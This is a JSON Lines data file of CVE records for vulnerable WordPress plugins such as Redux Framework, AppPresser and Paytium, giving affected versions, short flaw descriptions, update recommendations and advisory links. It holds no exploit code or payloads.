{"CVE_ID":"CVE-2024-6828","slug":"redux-framework","versionImpact":"4.4.17","versionEndExcluding":"4.4.18","description":"The Redux Framework plugin for WordPress is vulnerable to unauthenticated JSON file uploads due to missing authorization and capability checks on the Redux_Color_Scheme_Import function in versions 4.4.12 to 4.4.17. This makes it possible for unauthenticated attackers to upload JSON files, which can be used to conduct stored cross-site scripting attacks and, in some rare cases, when the wp_filesystem fails to initialize - to Remote Code Execution.","recommendation":"Update to version 4.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18a37063-31aa-4b1f-b1a5-1ea921a20686?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18a37063-31aa-4b1f-b1a5-1ea921a20686?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/core.trac.wordpress.org\\\/browser\\\/tags\\\/6.5.4\\\/src\\\/wp-includes\\\/class-wp-theme-json.php#L1690\",\"name\":\"https:\\\/\\\/core.trac.wordpress.org\\\/browser\\\/tags\\\/6.5.4\\\/src\\\/wp-includes\\\/class-wp-theme-json.php#L1690\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/extensions\\\/color_scheme\\\/color_scheme\\\/class-redux-color-scheme-import.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/extensions\\\/color_scheme\\\/color_scheme\\\/class-redux-color-scheme-import.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-helpers.php#L938\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-helpers.php#L938\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/fields\\\/typography\\\/redux-typography.js#L646\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/fields\\\/typography\\\/redux-typography.js#L646\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/trunk\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/trunk\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L614\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1561","slug":"apppresser","versionImpact":"4.4.10","versionEndExcluding":"4.4.11","description":"The AppPresser \u2013 Mobile App Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in all versions up to, and including, 4.4.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages when logging is enabled that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.10\\\/templates\\\/template.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.10\\\/templates\\\/template.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254632\\\/apppresser\\\/tags\\\/4.4.11\\\/inc\\\/AppPresser_Log_Admin.php?old=3219464&old_path=apppresser%2Ftags%2F4.4.10%2Finc%2FAppPresser_Log_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254632\\\/apppresser\\\/tags\\\/4.4.11\\\/inc\\\/AppPresser_Log_Admin.php?old=3219464&old_path=apppresser%2Ftags%2F4.4.10%2Finc%2FAppPresser_Log_Admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77328e35-b6e6-40eb-8c85-896d54419aef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77328e35-b6e6-40eb-8c85-896d54419aef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10939","slug":"image-widget","versionImpact":"4.4.10","versionEndExcluding":"4.4.11","description":"The Image Widget WordPress plugin before 4.4.11 does not sanitise and escape some of its Image Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcf50077-b360-4b63-bece-9806b4bc8bea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcf50077-b360-4b63-bece-9806b4bc8bea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35761","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.0","versionEndExcluding":"4.4.1","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Stored XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.0.","recommendation":"Update to version 4.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7200","slug":"eventon","versionImpact":"4.4.0","versionEndExcluding":"4.4.1","description":"The EventON WordPress plugin before 4.4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/586cf0a5-515c-43ea-8c03-f2f47ed13c2c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/586cf0a5-515c-43ea-8c03-f2f47ed13c2c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6141","slug":"essential-real-estate","versionImpact":"4.3.5","versionEndExcluding":"4.4.0","description":"The Essential Real Estate WordPress plugin before 4.4.0 does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Stored XSS attacks.","recommendation":"Update to version 4.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df12513b-9664-45be-8824-2924bfddf364\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df12513b-9664-45be-8824-2924bfddf364\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6139","slug":"essential-real-estate","versionImpact":"4.3.5","versionEndExcluding":"4.4.0","description":"The Essential Real Estate WordPress plugin before 4.4.0 does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Denial of Service attacks.","recommendation":"Update to version 4.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96396a22-f523-4c51-8b72-52be266988aa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96396a22-f523-4c51-8b72-52be266988aa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4611","slug":"apppresser","versionImpact":"4.3.2","versionEndExcluding":"4.4.0","description":"The AppPresser plugin for WordPress is vulnerable to improper missing encryption exception handling on the 'decrypt_value' and on the 'doCookieAuth' functions in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they previously used the login via the plugin API. This can only be exploited if the 'openssl' php extension is not loaded on the server.","recommendation":"Update to version 4.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1498fdf-9d5e-4277-92be-469d6646864b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1498fdf-9d5e-4277-92be-469d6646864b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_User.php?rev=2789173#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_User.php?rev=2789173#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093975\\\/apppresser\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093975\\\/apppresser\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7294","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the create_mollie_profile function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to create a mollie payment profile.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbd3209-7ed6-4409-a24e-9f6225cf10f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbd3209-7ed6-4409-a24e-9f6225cf10f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7293","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_mollie_account_details function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to verify the existence of a mollie account.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f065648a-436a-459c-8ab1-c948c78b43c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f065648a-436a-459c-8ab1-c948c78b43c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7292","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized notification dismissal due to a missing capability check on the paytium_notice_dismiss function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to dismiss admin notices.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6642c0-9011-419b-bef6-5aa594993c01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6642c0-9011-419b-bef6-5aa594993c01?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7291","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_mollie_account function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to set up a mollie account.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4491b89-2120-4edb-a396-e45ba09b3b99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4491b89-2120-4edb-a396-e45ba09b3b99?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7290","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_for_verified_profiles function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to check profile statuses.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af55c470-b94d-49ee-8b72-44652dcccd73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af55c470-b94d-49ee-8b72-44652dcccd73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7289","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized API key update due to a missing capability check on the paytium_sw_save_api_keys function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to change plugin API keys.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a92beff1-3bc6-459e-aeca-5cbdf2152388?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a92beff1-3bc6-459e-aeca-5cbdf2152388?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7288","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_profile_preference function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to change plugin settings.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9bee86-f491-4f68-b10b-051e0fb1a67b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9bee86-f491-4f68-b10b-051e0fb1a67b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7287","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized subscription cancellation due to a missing capability check on the pt_cancel_subscription function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to cancel a subscription to the plugin.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/060f31ab-cfa4-4ca8-846a-de76848b28fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/060f31ab-cfa4-4ca8-846a-de76848b28fb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4545","slug":"sitemap","versionEndExcluding":"4.4","description":"The Sitemap WordPress plugin before 4.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f482cb-fcfd-43e6-9a04-143e06351a70\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f482cb-fcfd-43e6-9a04-143e06351a70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5620","slug":"webpushr-web-push-notifications","versionImpact":"4.34.0","versionEndExcluding":"4.35.0","description":"The Web Push Notifications WordPress plugin before 4.35.0 does not prevent visitors on the site from changing some of the plugin options, some of which may be used to conduct Stored XSS attacks.","recommendation":"Update to version 4.35.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a03330c2-3ae0-404d-a114-33b18cc47666\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a03330c2-3ae0-404d-a114-33b18cc47666\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0254","slug":"guest-author-name","versionImpact":"4.34","versionEndExcluding":"4.35","description":"The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-author-name\\\/trunk\\\/sfly-guest-author.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-author-name\\\/trunk\\\/sfly-guest-author.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5630","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000023","versionEndExcluding":"4.3000000024","description":"The Insert or Embed Articulate Content into WordPress plugin before 4.3000000024 does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.","recommendation":"Update to version 4.3000000024, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/538c875f-4c20-4be0-8098-5bddb7aecff4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/538c875f-4c20-4be0-8098-5bddb7aecff4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6882","slug":"simple-membership","versionImpact":"4.3.8","versionEndExcluding":"4.3.9","description":"The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018environment_mode\u2019 parameter in all versions up to, and including, 4.3.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366165fe-93e5-49ab-b2e5-1de624f22286?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366165fe-93e5-49ab-b2e5-1de624f22286?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010737\\\/simple-membership\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010737\\\/simple-membership\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13490","slug":"ltl-freight-quotes-xpo-edition","versionImpact":"4.3.7","versionEndExcluding":"4.3.8","description":"The LTL Freight Quotes \u2013 XPO Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcfbc26-9b5d-4df8-9f16-293734bd2805?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcfbc26-9b5d-4df8-9f16-293734bd2805?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3897","slug":"ays-popup-box","versionImpact":"4.3.6","versionEndExcluding":"4.3.7","description":"The Popup Box \u2013 Best WordPress Popup Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_pb_create_author AJAX action in all versions up to, and including, 4.3.6. This makes it possible for unauthenticated attackers to enumerate all emails registered on the website.","recommendation":"Update to version 4.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71e3624-ccda-4c9c-90e9-e557dd19b644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71e3624-ccda-4c9c-90e9-e557dd19b644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073593\\\/ays-popup-box\\\/tags\\\/4.3.7\\\/admin\\\/class-ays-pb-admin.php?old=3072088&old_path=ays-popup-box%2Ftags%2F4.3.6%2Fadmin%2Fclass-ays-pb-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073593\\\/ays-popup-box\\\/tags\\\/4.3.7\\\/admin\\\/class-ays-pb-admin.php?old=3072088&old_path=ays-popup-box%2Ftags%2F4.3.6%2Fadmin%2Fclass-ays-pb-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9428","slug":"popup-builder","versionImpact":"4.3.4","versionEndExcluding":"4.3.5","description":"The Popup Builder  WordPress plugin before 4.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
